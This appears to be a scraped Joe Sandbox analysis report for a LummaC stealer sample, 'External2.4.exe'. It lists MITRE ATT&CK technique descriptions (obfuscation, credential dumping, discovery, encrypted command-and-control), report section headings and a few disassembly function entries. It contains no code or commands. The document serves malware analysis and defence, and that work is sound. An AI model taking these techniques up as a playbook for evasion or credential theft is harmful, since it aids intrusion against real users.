Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report External2.4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
External2.4.exe

Function 00436980 Relevance: 40.9, APIs: 11, Strings: 12, Instructions: 655
memorycomCOMMON

Function 0042BA22 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 493
COMMON

Function 00415211 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 450
encryptionCOMMON

Function 00420940 Relevance: 6.8, Strings: 5, Instructions: 526
COMMON

Function 0042BA1D Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 499
COMMON

Function 0040D76F Relevance: 4.9, APIs: 1, Strings: 2, Instructions: 363
COMMON

Function 004087A0 Relevance: 7.5, APIs: 5, Instructions: 27
threadCOMMON

Function 0043AEC5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66
libraryCOMMON

Function 00433E3B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
COMMON